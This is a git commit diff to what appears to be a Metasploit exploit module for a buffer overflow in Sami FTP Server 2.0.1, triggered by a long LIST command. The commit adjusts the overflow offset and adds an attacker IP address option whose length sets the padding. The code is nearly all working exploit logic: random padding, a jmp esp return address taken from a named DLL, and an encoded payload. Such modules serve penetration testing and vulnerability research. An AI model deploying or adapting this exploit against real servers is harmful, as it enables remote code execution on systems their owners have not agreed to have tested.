Uses IP address length in offset calculation

unstable
dougsko 2013-03-18 16:18:04 -03:00
parent 3d92d6e977
commit fb90a1b497
1 changed files with 10 additions and 4 deletions

View File

@ -17,7 +17,7 @@ class Metasploit4 < Msf::Exploit::Remote
'Name' => 'Sami FTP Server 2.0.1 LIST Command Buffer Overflow',
'Description' => %q{
A buffer overflow is triggered when a long LIST
command is sent to the server and the user views the Log tab.
command is sent to the server while the user is viewing the Logs tab.
},
'Platform' => 'win',
'Author' =>
@ -48,18 +48,24 @@ class Metasploit4 < Msf::Exploit::Remote
'Windows Universal',
{
'Ret' => 0x10028283, # jmp esp C:\Program Files\PMSystem\Temp\tmp0.dll
'Offset' => 219,
'Offset' => 225,
},
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 27 2013'))
register_options(
[
OptString.new('IPADDR', [true, 'Attacker\'s IP address'])
], self.class)
end
def exploit
connect_login
sleep 1
buf = rand_text(target['Offset'], payload_badchars)
ip_length = datastore['IPADDR'].length - 3
buf = rand_text_alphanumeric(target['Offset'] - ip_length)
buf << [ target['Ret'] ].pack('V')
buf << payload.encoded